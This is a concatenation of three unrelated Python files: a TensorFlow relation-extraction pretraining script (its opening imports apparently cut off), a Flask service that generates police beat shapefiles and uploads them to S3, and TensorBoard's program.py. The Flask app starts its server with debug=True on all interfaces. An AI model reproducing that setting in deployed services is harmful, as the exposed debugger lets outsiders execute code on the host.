import network_pretrain as network_pre#pretraining for random division.
import json
from sklearn.metrics import average_precision_score
import sys
import ctypes
import threading
from kg_dataset_transe import KnowledgeGraph
export_path = "../biomedical_part1/"
export_path_g = "../biomedical_part2/"
word_vec = np.load(export_path + 'vec.npy')
KG = KnowledgeGraph(export_path)
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_float('nbatch_kg', 200,'entity numbers used each training time')
tf.app.flags.DEFINE_float('margin',1.0,'entity numbers used each training time')
tf.app.flags.DEFINE_float('learning_rate_kg',0.05,'learning rate for kg')
tf.app.flags.DEFINE_integer('rel_total', 87,'total of relations')
tf.app.flags.DEFINE_integer('katt_flag', 13, 'type of attention')
tf.app.flags.DEFINE_string('model', 'cnn', 'neural models to encode sentences')
tf.app.flags.DEFINE_integer('max_length', 120,'maximum of number of words in one sentence')
tf.app.flags.DEFINE_integer('pos_num', 120 * 2 + 1,'number of position embedding vectors')
tf.app.flags.DEFINE_integer('num_classes', 87,'maximum of relations')
tf.app.flags.DEFINE_integer('hidden_size', 100,'hidden feature size')
#tf.app.flags.DEFINE_integer('hidden_size', 200,'hidden feature size')#for svd.
tf.app.flags.DEFINE_integer('pos_size', 5,'position embedding size')
#tf.app.flags.DEFINE_integer('max_epoch_pre', 50,'maximum of training epochs')
tf.app.flags.DEFINE_integer('max_epoch_pre', 2,'maximum of training epochs')
tf.app.flags.DEFINE_integer('batch_size',50,'entity numbers used each training time')
tf.app.flags.DEFINE_float('learning_rate',0.02,'learning rate for nn')
tf.app.flags.DEFINE_float('weight_decay',0.00001,'weight_decay')
tf.app.flags.DEFINE_float('keep_prob',0.5,'dropout rate')
tf.app.flags.DEFINE_string('model_dir', './model/','path to store model')
tf.app.flags.DEFINE_string('summary_dir','./summary','path to store summary_dir')
def MakeSummary(name, value):
"""Creates a tf.Summary proto with the given name and value."""
summary = tf.Summary()
val = summary.value.add()
val.tag = str(name)
val.simple_value = float(value)
return summary
def make_shape(array,last_dim):
output = []
for i in array:
for j in i:
output.append(j)
output = np.array(output)
if np.shape(output)[-1]==last_dim:
return output
else:
print 'Make Shape Error!'
def main(_):
word_vec = np.load(export_path + 'vec.npy')
instance_triple = np.load(export_path + 'train_instance_triple0.npy')
instance_scope = np.load(export_path + 'train_instance_scope0.npy')
instance_scope_path = np.load(export_path_g + 'train_instance_scope_kg0.npy')
instance_scope_path3 = np.load(export_path_g + 'train_instance_scope_tx0.npy')
instance_scope_path4 = np.load(export_path_g + 'train_instance_scope_ug0.npy')
train_len = np.load(export_path + 'train_len0.npy')
train_label = np.load(export_path + 'train_label0.npy')
train_word = np.load(export_path + 'train_word0.npy')
train_pos1 = np.load(export_path + 'train_pos10.npy')
train_pos2 = np.load(export_path + 'train_pos20.npy')
train_word_cross = np.load(export_path_g + 'train_word_cross0.npy')
train_pos1_cross = np.load(export_path_g + 'train_pos1_cross0.npy')
train_pos2_cross = np.load(export_path_g + 'train_pos2_cross0.npy')
train_word_cross3 = np.load(export_path_g + 'train_word_cross_tx0.npy')
train_pos1_cross3 = np.load(export_path_g + 'train_pos1_cross_tx0.npy')
train_pos2_cross3 = np.load(export_path_g + 'train_pos2_cross_tx0.npy')
train_word_cross4 = np.load(export_path_g + 'train_word_cross_ug0.npy')
train_pos1_cross4 = np.load(export_path_g + 'train_pos1_cross_ug0.npy')
train_pos2_cross4 = np.load(export_path_g + 'train_pos2_cross_ug0.npy')
train_mask = np.load(export_path + 'train_mask0.npy')
train_head = np.load(export_path + 'train_head0.npy')
train_tail = np.load(export_path + 'train_tail0.npy')
reltot = {}
for index, i in enumerate(train_label):
if not i in reltot:
reltot[i] = 1.0
else:
reltot[i] += 1.0
for i in reltot:
reltot[i] = 1/(reltot[i] ** (0.05))
print 'building network...'
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
model = network_pre.CNN(is_training = True, word_embeddings = word_vec)
global_step = tf.Variable(0,name='global_step',trainable=False)
global_step_kg = tf.Variable(0,name='global_step_kg',trainable=False)
tf.summary.scalar('learning_rate', FLAGS.learning_rate)
tf.summary.scalar('learning_rate_kg', FLAGS.learning_rate_kg)
optimizer = tf.train.GradientDescentOptimizer(FLAGS.learning_rate)
grads_and_vars = optimizer.compute_gradients(model.loss)
train_op = optimizer.apply_gradients(grads_and_vars, global_step = global_step)
optimizer_kg = tf.train.GradientDescentOptimizer(FLAGS.learning_rate_kg)
grads_and_vars_kg = optimizer_kg.compute_gradients(model.loss_kg)
train_op_kg = optimizer_kg.apply_gradients(grads_and_vars_kg, global_step = global_step_kg)
merged_summary = tf.summary.merge_all()
summary_writer = tf.summary.FileWriter(FLAGS.summary_dir, sess.graph)
sess.run(tf.global_variables_initializer())
saver = tf.train.Saver(max_to_keep=None)
print 'building finished'
batch_size = int(KG.n_triplet / FLAGS.nbatch_kg)
def train_kg(coord):
def train_step_kg(pos_h_batch, pos_t_batch, pos_r_batch, neg_h_batch, neg_t_batch, neg_r_batch):
feed_dict = {
model.pos_h: pos_h_batch,
model.pos_t: pos_t_batch,
model.pos_r: pos_r_batch,
model.neg_h: neg_h_batch,
model.neg_t: neg_t_batch,
model.neg_r: neg_r_batch
}
_, step, loss = sess.run(
[train_op_kg, global_step_kg, model.loss_kg], feed_dict)
return loss
batch_size = int(KG.n_triplet / FLAGS.nbatch_kg)
times_kg = 0
while not coord.should_stop():
#while True:
times_kg += 1
res = 0.0
pos_batch_gen = KG.next_pos_batch(batch_size)
neg_batch_gen = KG.next_neg_batch(batch_size)
for batchi in range(int(FLAGS.nbatch_kg)):
pos_batch = next(pos_batch_gen)
neg_batch = next(neg_batch_gen)
ph = pos_batch[:, 0]
pt = pos_batch[:, 1]
pr = pos_batch[:, 2]
nh = neg_batch[:, 0]
nt = neg_batch[:, 1]
nr = neg_batch[:, 2]
res += train_step_kg(ph, pt, pr, nh, nt, nr)
time_str = datetime.datetime.now().isoformat()
print "batch %d time %s | loss : %f" % (times_kg, time_str, res)
def train_nn(coord):
def train_step(head, tail, word, pos1, pos2, mask, leng, label_index, label, scope, weights,
word_cr, pos1_cr, pos2_cr, scope_path, head_path, tail_path):
feed_dict = {
model.head_index: head,
model.tail_index: tail,
model.head_index_path: head_path,
model.tail_index_path: tail_path,
model.word: word,
model.pos1: pos1,
model.pos2: pos2,
model.word_cross: word_cr,
model.pos1_cross: pos1_cr,
model.pos2_cross: pos2_cr,
model.mask: mask,
model.len : leng,
model.label_index: label_index,
model.label: label,
model.scope: scope,
model.scope_path: scope_path,
model.keep_prob: FLAGS.keep_prob,
model.weights: weights
}
_, step, loss, summary, output, correct_predictions = sess.run([train_op, global_step, model.loss, merged_summary, model.output, model.correct_predictions], feed_dict)
summary_writer.add_summary(summary, step)
return output, loss, correct_predictions
stack_output = []
stack_label = []
stack_ce_loss = []
train_order = range(len(instance_triple))
save_epoch = 2
eval_step = 300
for one_epoch in range(FLAGS.max_epoch_pre):
print('pretrain epoch '+str(one_epoch+1)+' starts!')
np.random.shuffle(train_order)
s1 = 0.0
s2 = 0.0
tot1 = 0.0
tot2 = 1.0
losstot = 0.0
for i in range(int(len(train_order)/float(FLAGS.batch_size))):
input_scope = np.take(instance_scope, train_order[i * FLAGS.batch_size:(i+1)*FLAGS.batch_size], axis=0)
input_scope_path = np.take(instance_scope_path, train_order[i * FLAGS.batch_size:(i+1)*FLAGS.batch_size], axis=0)
input_scope_path3 = np.take(instance_scope_path3, train_order[i * FLAGS.batch_size:(i+1)*FLAGS.batch_size], axis=0)
input_scope_path4 = np.take(instance_scope_path4, train_order[i * FLAGS.batch_size:(i+1)*FLAGS.batch_size], axis=0)
index = []
scope = [0]
index_path = []
index_path3 = []
index_path4 = []
scope_path = [0]
scope_path3 = [0]
scope_path4 = [0]
label = []
weights = []
train_head_path = []
train_tail_path = []
train_head_path3 = []
train_tail_path3 = []
train_head_path4 = []
train_tail_path4 = []
for num, num_path, num_path3, num_path4 in zip(input_scope, input_scope_path, input_scope_path3, input_scope_path4):
index = index + range(num[0], num[1] + 1)
label.append(train_label[num[0]])
scope.append(scope[len(scope)-1] + num[1] - num[0] + 1)
weights.append(reltot[train_label[num[0]]])
index_path = index_path + range(num_path[0], num_path[1] + 1)
scope_path.append(scope_path[len(scope_path)-1] + num_path[1] - num_path[0] + 1)
index_path3 = index_path3 + range(num_path3[0], num_path3[1] + 1)
scope_path3.append(scope_path3[len(scope_path3)-1] + num_path3[1] - num_path3[0] + 1)
index_path4 = index_path4 + range(num_path4[0], num_path4[1] + 1)
scope_path4.append(scope_path4[len(scope_path4)-1] + num_path4[1] - num_path4[0] + 1)
train_head_path += [train_head[num[0]]]*len(range(num_path[0], num_path[1] + 1))
train_tail_path += [train_tail[num[0]]]*len(range(num_path[0], num_path[1] + 1))
train_head_path3 += [train_head[num[0]]]*len(range(num_path3[0], num_path3[1] + 1))
train_tail_path3 += [train_tail[num[0]]]*len(range(num_path3[0], num_path3[1] + 1))
train_head_path4 += [train_head[num[0]]]*len(range(num_path4[0], num_path4[1] + 1))
train_tail_path4 += [train_tail[num[0]]]*len(range(num_path4[0], num_path4[1] + 1))
label_ = np.zeros((FLAGS.batch_size, FLAGS.num_classes))
label_[np.arange(FLAGS.batch_size), label] = 1
output, loss, correct_predictions = train_step(train_head[index], train_tail[index], train_word[index,:], train_pos1[index,:], train_pos2[index,:],
train_mask[index,:], train_len[index],train_label[index], label_, np.array(scope), weights,
train_word_cross3[index_path3,:], train_pos1_cross3[index_path3,:], train_pos2_cross3[index_path3,:],
np.array(scope_path3), train_head_path3, train_tail_path3)
output, loss, correct_predictions = train_step(train_head[index], train_tail[index], train_word[index,:], train_pos1[index,:], train_pos2[index,:],
train_mask[index,:], train_len[index],train_label[index], label_, np.array(scope), weights,
train_word_cross4[index_path4,:], train_pos1_cross4[index_path4,:], train_pos2_cross4[index_path4,:],
np.array(scope_path4), train_head_path4, train_tail_path4)
output, loss, correct_predictions = train_step(train_head[index], train_tail[index], train_word[index,:], train_pos1[index,:], train_pos2[index,:],
train_mask[index,:], train_len[index],train_label[index], label_, np.array(scope), weights,
train_word_cross[index_path,:], train_pos1_cross[index_path,:], train_pos2_cross[index_path,:],
np.array(scope_path), train_head_path, train_tail_path)
num = 0
s = 0
losstot += loss
for num in correct_predictions:
if label[s] == 0:
tot1 += 1.0
if num:
s1+= 1.0
else:
tot2 += 1.0
if num:
s2 += 1.0
s = s + 1
time_str = datetime.datetime.now().isoformat()
print "pretrain epoch %d step %d time %s | loss : %f, not NA accuracy: %f" % (one_epoch, i, time_str, loss, s2 / tot2)
current_step = tf.train.global_step(sess, global_step)
if (one_epoch + 1) % save_epoch == 0 and (one_epoch + 1) >= FLAGS.max_epoch_pre:
print 'epoch '+str(one_epoch+1)+' has finished'
print 'saving model...'
path = saver.save(sess,FLAGS.model_dir+'pretrain_'+str(FLAGS.max_epoch_pre))
print 'have savde model to '+path
coord.request_stop()
coord = tf.train.Coordinator()
threads = []
threads.append(threading.Thread(target=train_kg, args=(coord,)))
threads.append(threading.Thread(target=train_nn, args=(coord,)))
for t in threads: t.start()
coord.join(threads)
if __name__ == "__main__":
tf.app.run()
|
app.py
|
import threading
from zipfile import ZipFile
from flask import Flask, request
import uuid
import sys
import subprocess
import settings as s
import utils as u
import boto3
import os.path
logger = u.init_logger(__name__)
app = Flask(__name__)
@app.route('/', methods=['POST'])
def index():
file_name = None
script_params = {}
try:
request_params = dict(request.form)
logger.info(f'Request params received from web server: {request_params}')
script_params = get_beat_generator_params(request_params)
logger.info(f'Script params: {script_params}')
params_as_script_argument = "<param>".join([f"{k}<=>{v}" for k, v in script_params.items()])
logger.info(f'Script params in concatenated format: {params_as_script_argument}')
proc = subprocess.run([sys.executable, 'beat_generator.py', params_as_script_argument])
logger.info(f'Subprocess return code: {proc.returncode}')
response_txt = None
if proc.returncode == 0:
logger.info('Script executed successfully. Creating zip file')
zip_path, file_name = create_output_zip_file(script_params[s.beat_name])
logger.info(f'Uploading zip file to S3: {file_name}')
upload_file_to_s3(zip_path, file_name)
response_txt = file_name
else:
logger.error(f"Beat generation script exited with non-zero status: {proc.returncode}")
return f"App server has encountered an unexpected condition", 500
if not response_txt:
logger.error(f"Couldn't create zip file: {file_name}")
return f"There was an issue processing your request", 400
return response_txt, 200
finally:
if s.input_shapefile_path in script_params:
pwcc_file_name = script_params[s.input_shapefile_path].split('.')[0]
logger.info(f'pwcc file path to be deleted: {pwcc_file_name}')
t1 = threading.Thread(target=u.delete_file, args=(pwcc_file_name,))
t1.start()
if file_name:
output_file_name = f"{s.output_path}/{file_name.split('.')[0]}"
logger.info(f'Output file path to be deleted: {output_file_name}')
t2 = threading.Thread(target=u.delete_file, args=(output_file_name,))
t2.start()
def get_beat_generator_params(request_params):
params = {}
# Unique Beat name
beat_name = ''.join([str(uuid.uuid4().hex[:6]), '_beat'])
params[s.beat_name] = beat_name
# Polygon-wise crime count shapefile location
pwcc_shapefile_name = request_params['polygon_wise_count_shapefile']
u.download_file_from_s3(s.output_s3_bucket_name, pwcc_shapefile_name)
pwcc_shapefile_prefix = pwcc_shapefile_name.split('.')[0]
params[s.input_shapefile_path] = f'data/input/{pwcc_shapefile_prefix}.shp'
# Build balanced zones params
params[s.zone_creation_method] = request_params[s.beat_creation_method]
if params[s.zone_creation_method] == 'ATTRIBUTE_TARGET':
params[s.zone_building_criteria_target] = f"count {request_params.get('cfs_per_beat', 10000)} 1"
elif params[s.zone_creation_method] == 'NUMBER_ZONES_AND_ATTRIBUTE':
params[s.number_of_zones] = request_params[s.number_of_beats]
params[s.zone_building_criteria] = "count 1"
return params
def create_output_zip_file(beat_name):
with ZipFile(f'{s.output_path}/{beat_name}.zip', 'w') as zip_obj:
for ext in s.shapefile_components:
file_path = f'{s.output_path}/{beat_name}{ext}'
if os.path.exists(file_path):
logger.info(file_path + " : EXISTS")
zip_obj.write(f'{s.output_path}/{beat_name}{ext}', f'{beat_name}{ext}')
else:
logger.info(file_path + " : DOESN'T EXIST")
return f'{s.output_path}/{beat_name}.zip', f'{beat_name}.zip'
def upload_file_to_s3(filepath, object_name):
s3_resource = boto3.resource('s3')
s3_resource.Bucket(s.output_s3_bucket_name).upload_file(filepath, f'{s.s3_beats_dir_name}/{object_name}')
if __name__ == '__main__':
app.run(host='0.0.0.0', debug=True)
|
program.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities for TensorBoard command line program.
This is a lightweight module for bringing up a TensorBoard HTTP server
or emulating the `tensorboard` shell command.
Those wishing to create custom builds of TensorBoard can use this module
by swapping out `tensorboard.main` with the custom definition that
modifies the set of plugins and static assets.
This module does not depend on first-party plugins or the default web
server assets. Those are defined in `tensorboard.default`.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from abc import ABCMeta
from abc import abstractmethod
import argparse
import atexit
from collections import defaultdict
import errno
import inspect
import logging
import os
import signal
import socket
import sys
import threading
import time
import absl.logging
import six
from six.moves import urllib
from six.moves import xrange # pylint: disable=redefined-builtin
from werkzeug import serving
from tensorboard import manager
from tensorboard import version
from tensorboard.backend import application
from tensorboard.backend.event_processing import event_file_inspector as efi
from tensorboard.plugins import base_plugin
from tensorboard.plugins.core import core_plugin
from tensorboard.util import tb_logging
try:
from absl import flags as absl_flags
from absl.flags import argparse_flags
except ImportError:
# Fall back to argparse with no absl flags integration.
absl_flags = None
argparse_flags = argparse
logger = tb_logging.get_logger()
def setup_environment():
"""Makes recommended modifications to the environment.
This functions changes global state in the Python process. Calling
this function is a good idea, but it can't appropriately be called
from library routines.
"""
absl.logging.set_verbosity(absl.logging.WARNING)
# The default is HTTP/1.0 for some strange reason. If we don't use
# HTTP/1.1 then a new TCP socket and Python thread is created for
# each HTTP request. The tradeoff is we must always specify the
# Content-Length header, or do chunked encoding for streaming.
serving.WSGIRequestHandler.protocol_version = 'HTTP/1.1'
def get_default_assets_zip_provider():
"""Opens stock TensorBoard web assets collection.
Returns:
Returns function that returns a newly opened file handle to zip file
containing static assets for stock TensorBoard, or None if webfiles.zip
could not be found. The value the callback returns must be closed. The
paths inside the zip file are considered absolute paths on the web server.
"""
path = os.path.join(os.path.dirname(inspect.getfile(sys._getframe(1))),
'webfiles.zip')
if not os.path.exists(path):
logger.warning('webfiles.zip static assets not found: %s', path)
return None
return lambda: open(path, 'rb')
class TensorBoard(object):
"""Class for running TensorBoard.
Fields:
plugin_loaders: Set from plugins passed to constructor.
assets_zip_provider: Set by constructor.
server_class: Set by constructor.
flags: An argparse.Namespace set by the configure() method.
cache_key: As `manager.cache_key`; set by the configure() method.
"""
def __init__(self,
plugins=None,
assets_zip_provider=None,
server_class=None):
"""Creates new instance.
Args:
plugins: A list of TensorBoard plugins to load, as TBLoader instances or
TBPlugin classes. If not specified, defaults to first-party plugins.
assets_zip_provider: Delegates to TBContext or uses default if None.
server_class: An optional factory for a `TensorBoardServer` to use
for serving the TensorBoard WSGI app. If provided, its callable
signature should match that of `TensorBoardServer.__init__`.
:type plugins: list[Union[base_plugin.TBLoader, Type[base_plugin.TBPlugin]]]
:type assets_zip_provider: () -> file
:type server_class: class
"""
if plugins is None:
from tensorboard import default
plugins = default.get_plugins()
if assets_zip_provider is None:
assets_zip_provider = get_default_assets_zip_provider()
if server_class is None:
server_class = create_port_scanning_werkzeug_server
def make_loader(plugin):
if isinstance(plugin, base_plugin.TBLoader):
return plugin
if issubclass(plugin, base_plugin.TBPlugin):
return base_plugin.BasicLoader(plugin)
raise ValueError("Not a TBLoader or TBPlugin subclass: %s" % plugin)
self.plugin_loaders = [make_loader(p) for p in plugins]
self.assets_zip_provider = assets_zip_provider
self.server_class = server_class
self.flags = None
def configure(self, argv=('',), **kwargs):
"""Configures TensorBoard behavior via flags.
This method will populate the "flags" property with an argparse.Namespace
representing flag values parsed from the provided argv list, overridden by
explicit flags from remaining keyword arguments.
Args:
argv: Can be set to CLI args equivalent to sys.argv; the first arg is
taken to be the name of the path being executed.
kwargs: Additional arguments will override what was parsed from
argv. They must be passed as Python data structures, e.g.
`foo=1` rather than `foo="1"`.
Returns:
Either argv[:1] if argv was non-empty, or [''] otherwise, as a mechanism
for absl.app.run() compatibility.
Raises:
ValueError: If flag values are invalid.
"""
parser = argparse_flags.ArgumentParser(
prog='tensorboard',
description=('TensorBoard is a suite of web applications for '
'inspecting and understanding your TensorFlow runs '
'and graphs. https://github.com/tensorflow/tensorboard '))
for loader in self.plugin_loaders:
loader.define_flags(parser)
arg0 = argv[0] if argv else ''
flags = parser.parse_args(argv[1:]) # Strip binary name from argv.
self.cache_key = manager.cache_key(
working_directory=os.getcwd(),
arguments=argv[1:],
configure_kwargs=kwargs,
)
if absl_flags and arg0:
# Only expose main module Abseil flags as TensorBoard native flags.
# This is the same logic Abseil's ArgumentParser uses for determining
# which Abseil flags to include in the short helpstring.
for flag in set(absl_flags.FLAGS.get_key_flags_for_module(arg0)):
if hasattr(flags, flag.name):
raise ValueError('Conflicting Abseil flag: %s' % flag.name)
setattr(flags, flag.name, flag.value)
for k, v in kwargs.items():
if not hasattr(flags, k):
raise ValueError('Unknown TensorBoard flag: %s' % k)
setattr(flags, k, v)
for loader in self.plugin_loaders:
loader.fix_flags(flags)
self.flags = flags
return [arg0]
def main(self, ignored_argv=('',)):
"""Blocking main function for TensorBoard.
This method is called by `tensorboard.main.run_main`, which is the
standard entrypoint for the tensorboard command line program. The
configure() method must be called first.
Args:
ignored_argv: Do not pass. Required for Abseil compatibility.
Returns:
Process exit code, i.e. 0 if successful or non-zero on failure. In
practice, an exception will most likely be raised instead of
returning non-zero.
:rtype: int
"""
self._install_signal_handler(signal.SIGTERM, "SIGTERM")
if self.flags.inspect:
logger.info('Not bringing up TensorBoard, but inspecting event files.')
event_file = os.path.expanduser(self.flags.event_file)
efi.inspect(self.flags.logdir, event_file, self.flags.tag)
return 0
if self.flags.version_tb:
print(version.VERSION)
return 0
try:
server = self._make_server()
sys.stderr.write('TensorBoard %s at %s (Press CTRL+C to quit)\n' %
(version.VERSION, server.get_url()))
sys.stderr.flush()
self._register_info(server)
server.serve_forever()
return 0
except TensorBoardServerException as e:
logger.error(e.msg)
sys.stderr.write('ERROR: %s\n' % e.msg)
sys.stderr.flush()
return -1
def launch(self):
"""Python API for launching TensorBoard.
This method is the same as main() except it launches TensorBoard in
a separate permanent thread. The configure() method must be called
first.
Returns:
The URL of the TensorBoard web server.
:rtype: str
"""
# Make it easy to run TensorBoard inside other programs, e.g. Colab.
server = self._make_server()
thread = threading.Thread(target=server.serve_forever, name='TensorBoard')
thread.daemon = True
thread.start()
return server.get_url()
def _register_info(self, server):
"""Write a TensorBoardInfo file and arrange for its cleanup.
Args:
server: The result of `self._make_server()`.
"""
server_url = urllib.parse.urlparse(server.get_url())
info = manager.TensorBoardInfo(
version=version.VERSION,
start_time=int(time.time()),
port=server_url.port,
pid=os.getpid(),
path_prefix=self.flags.path_prefix,
logdir=self.flags.logdir,
db=self.flags.db,
cache_key=self.cache_key,
)
atexit.register(manager.remove_info_file)
manager.write_info_file(info)
def _install_signal_handler(self, signal_number, signal_name):
"""Set a signal handler to gracefully exit on the given signal.
When this process receives the given signal, it will run `atexit`
handlers and then exit with `0`.
Args:
signal_number: The numeric code for the signal to handle, like
`signal.SIGTERM`.
signal_name: The human-readable signal name.
"""
old_signal_handler = None # set below
def handler(handled_signal_number, frame):
# In case we catch this signal again while running atexit
# handlers, take the hint and actually die.
signal.signal(signal_number, signal.SIG_DFL)
sys.stderr.write("TensorBoard caught %s; exiting...\n" % signal_name)
# The main thread is the only non-daemon thread, so it suffices to
# exit hence.
if old_signal_handler not in (signal.SIG_IGN, signal.SIG_DFL):
old_signal_handler(handled_signal_number, frame)
sys.exit(0)
old_signal_handler = signal.signal(signal_number, handler)
def _make_server(self):
"""Constructs the TensorBoard WSGI app and instantiates the server."""
app = application.standard_tensorboard_wsgi(self.flags,
self.plugin_loaders,
self.assets_zip_provider)
return self.server_class(app, self.flags)
@six.add_metaclass(ABCMeta)
class TensorBoardServer(object):
"""Class for customizing TensorBoard WSGI app serving."""
@abstractmethod
def __init__(self, wsgi_app, flags):
"""Create a flag-configured HTTP server for TensorBoard's WSGI app.
Args:
wsgi_app: The TensorBoard WSGI application to create a server for.
flags: argparse.Namespace instance of TensorBoard flags.
"""
raise NotImplementedError()
@abstractmethod
def serve_forever(self):
"""Blocking call to start serving the TensorBoard server."""
raise NotImplementedError()
@abstractmethod
def get_url(self):
"""Returns a URL at which this server should be reachable."""
raise NotImplementedError()
class TensorBoardServerException(Exception):
"""Exception raised by TensorBoardServer for user-friendly errors.
Subclasses of TensorBoardServer can raise this exception in order to
generate a clean error message for the user rather than a stacktrace.
"""
def __init__(self, msg):
self.msg = msg
class TensorBoardPortInUseError(TensorBoardServerException):
"""Error raised when attempting to bind to a port that is in use.
This should be raised when it is expected that binding to another
similar port would succeed. It is used as a signal to indicate that
automatic port searching should continue rather than abort.
"""
pass
def with_port_scanning(cls):
"""Create a server factory that performs port scanning.
This function returns a callable whose signature matches the
specification of `TensorBoardServer.__init__`, using `cls` as an
underlying implementation. It passes through `flags` unchanged except
in the case that `flags.port is None`, in which case it repeatedly
instantiates the underlying server with new port suggestions.
Args:
cls: A valid implementation of `TensorBoardServer`. This class's
initializer should raise a `TensorBoardPortInUseError` upon
failing to bind to a port when it is expected that binding to
another nearby port might succeed.
The initializer for `cls` will only ever be invoked with `flags`
such that `flags.port is not None`.
Returns:
A function that implements the `__init__` contract of
`TensorBoardServer`.
"""
def init(wsgi_app, flags):
# base_port: what's the first port to which we should try to bind?
# should_scan: if that fails, shall we try additional ports?
# max_attempts: how many ports shall we try?
should_scan = flags.port is None
base_port = core_plugin.DEFAULT_PORT if flags.port is None else flags.port
max_attempts = 10 if should_scan else 1
if base_port > 0xFFFF:
raise TensorBoardServerException(
'TensorBoard cannot bind to port %d > %d' % (base_port, 0xFFFF)
)
max_attempts = 10 if should_scan else 1
base_port = min(base_port + max_attempts, 0x10000) - max_attempts
for port in xrange(base_port, base_port + max_attempts):
subflags = argparse.Namespace(**vars(flags))
subflags.port = port
try:
return cls(wsgi_app=wsgi_app, flags=subflags)
except TensorBoardPortInUseError:
if not should_scan:
raise
# All attempts failed to bind.
raise TensorBoardServerException(
'TensorBoard could not bind to any port around %s '
'(tried %d times)'
% (base_port, max_attempts))
return init
class WerkzeugServer(serving.ThreadedWSGIServer, TensorBoardServer):
"""Implementation of TensorBoardServer using the Werkzeug dev server."""
# ThreadedWSGIServer handles this in werkzeug 0.12+ but we allow 0.11.x.
daemon_threads = True
def __init__(self, wsgi_app, flags):
self._flags = flags
host = flags.host
port = flags.port
# Without an explicit host, we default to serving on all interfaces,
# and will attempt to serve both IPv4 and IPv6 traffic through one
# socket.
self._auto_wildcard = not host
if self._auto_wildcard:
host = self._get_wildcard_address(port)
self._fix_werkzeug_logging()
try:
super(WerkzeugServer, self).__init__(host, port, wsgi_app)
except socket.error as e:
if hasattr(errno, 'EACCES') and e.errno == errno.EACCES:
raise TensorBoardServerException(
'TensorBoard must be run as superuser to bind to port %d' %
port)
elif hasattr(errno, 'EADDRINUSE') and e.errno == errno.EADDRINUSE:
if port == 0:
raise TensorBoardServerException(
'TensorBoard unable to find any open port')
else:
raise TensorBoardPortInUseError(
'TensorBoard could not bind to port %d, it was already in use' %
port)
elif hasattr(errno, 'EADDRNOTAVAIL') and e.errno == errno.EADDRNOTAVAIL:
raise TensorBoardServerException(
'TensorBoard could not bind to unavailable address %s' % host)
elif hasattr(errno, 'EAFNOSUPPORT') and e.errno == errno.EAFNOSUPPORT:
raise TensorBoardServerException(
'Tensorboard could not bind to unsupported address family %s' %
host)
# Raise the raw exception if it wasn't identifiable as a user error.
raise
def _get_wildcard_address(self, port):
"""Returns a wildcard address for the port in question.
This will attempt to follow the best practice of calling getaddrinfo() with
a null host and AI_PASSIVE to request a server-side socket wildcard address.
If that succeeds, this returns the first IPv6 address found, or if none,
then returns the first IPv4 address. If that fails, then this returns the
hardcoded address "::" if socket.has_ipv6 is True, else "0.0.0.0".
"""
fallback_address = '::' if socket.has_ipv6 else '0.0.0.0'
if hasattr(socket, 'AI_PASSIVE'):
try:
addrinfos = socket.getaddrinfo(None, port, socket.AF_UNSPEC,
socket.SOCK_STREAM, socket.IPPROTO_TCP,
socket.AI_PASSIVE)
except socket.gaierror as e:
logger.warn('Failed to auto-detect wildcard address, assuming %s: %s',
fallback_address, str(e))
return fallback_address
addrs_by_family = defaultdict(list)
for family, _, _, _, sockaddr in addrinfos:
# Format of the "sockaddr" socket address varies by address family,
# but [0] is always the IP address portion.
addrs_by_family[family].append(sockaddr[0])
if hasattr(socket, 'AF_INET6') and addrs_by_family[socket.AF_INET6]:
return addrs_by_family[socket.AF_INET6][0]
if hasattr(socket, 'AF_INET') and addrs_by_family[socket.AF_INET]:
return addrs_by_family[socket.AF_INET][0]
logger.warn('Failed to auto-detect wildcard address, assuming %s',
fallback_address)
return fallback_address
def server_bind(self):
"""Override to enable IPV4 mapping for IPV6 sockets when desired.
The main use case for this is so that when no host is specified, TensorBoard
can listen on all interfaces for both IPv4 and IPv6 connections, rather than
having to choose v4 or v6 and hope the browser didn't choose the other one.
"""
socket_is_v6 = (
hasattr(socket, 'AF_INET6') and self.socket.family == socket.AF_INET6)
has_v6only_option = (
hasattr(socket, 'IPPROTO_IPV6') and hasattr(socket, 'IPV6_V6ONLY'))
if self._auto_wildcard and socket_is_v6 and has_v6only_option:
try:
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0)
except socket.error as e:
# Log a warning on failure to dual-bind, except for EAFNOSUPPORT
# since that's expected if IPv4 isn't supported at all (IPv6-only).
if hasattr(errno, 'EAFNOSUPPORT') and e.errno != errno.EAFNOSUPPORT:
logger.warn('Failed to dual-bind to IPv4 wildcard: %s', str(e))
super(WerkzeugServer, self).server_bind()
def handle_error(self, request, client_address):
"""Override to get rid of noisy EPIPE errors."""
del request # unused
# Kludge to override a SocketServer.py method so we can get rid of noisy
# EPIPE errors. They're kind of a red herring as far as errors go. For
# example, `curl -N http://localhost:6006/ | head` will cause an EPIPE.
exc_info = sys.exc_info()
e = exc_info[1]
if isinstance(e, IOError) and e.errno == errno.EPIPE:
logger.warn('EPIPE caused by %s in HTTP serving' % str(client_address))
else:
logger.error('HTTP serving error', exc_info=exc_info)
def get_url(self):
if self._auto_wildcard:
display_host = socket.gethostname()
else:
host = self._flags.host
display_host = (
'[%s]' % host if ':' in host and not host.startswith('[') else host)
return 'http://%s:%d%s/' % (display_host, self.server_port,
self._flags.path_prefix.rstrip('/'))
def _fix_werkzeug_logging(self):
"""Fix werkzeug logging setup so it inherits TensorBoard's log level.
This addresses a change in werkzeug 0.15.0+ [1] that causes it set its own
log level to INFO regardless of the root logger configuration. We instead
want werkzeug to inherit TensorBoard's root logger log level (set via absl
to WARNING by default).
[1]: https://github.com/pallets/werkzeug/commit/4cf77d25858ff46ac7e9d64ade054bf05b41ce12
"""
# Log once at DEBUG to force werkzeug to initialize its singleton logger,
# which sets the logger level to INFO it if is unset, and then access that
# object via logging.getLogger('werkzeug') to durably revert the level to
# unset (and thus make messages logged to it inherit the root logger level).
self.log('debug', 'Fixing werkzeug logger to inherit TensorBoard log level')
logging.getLogger('werkzeug').setLevel(logging.NOTSET)
